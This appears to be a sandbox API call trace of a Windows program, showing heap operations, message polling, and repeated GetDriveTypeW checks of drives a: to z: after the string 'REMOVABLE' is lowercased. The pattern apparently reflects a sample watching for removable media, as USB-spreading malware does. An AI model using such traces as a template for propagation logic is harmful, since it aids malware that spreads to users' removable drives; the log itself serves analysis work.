RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.253] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.253] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.253] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.254] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.254] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.254] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.254] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.254] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.254] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.255] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.255] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.255] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.255] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.255] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.256] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.256] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.256] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.256] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.256] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.257] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.257] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.257] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.257] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.257] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.258] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.258] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.258] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0214.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0214.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.260] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.260] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.260] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.261] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.261] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.261] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.261] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.261] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.262] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.262] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.262] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.262] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.262] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.263] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.263] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.263] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.263] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.263] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.264] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.265] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.266] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0214.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0214.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.267] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.267] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.267] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.268] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.268] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.268] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.268] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.268] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.268] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.269] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.269] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.269] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.269] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.269] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.270] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.270] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.270] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.271] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.272] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.273] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.273] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0214.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.274] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0214.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0214.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.283] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.284] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.284] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.284] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.284] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) 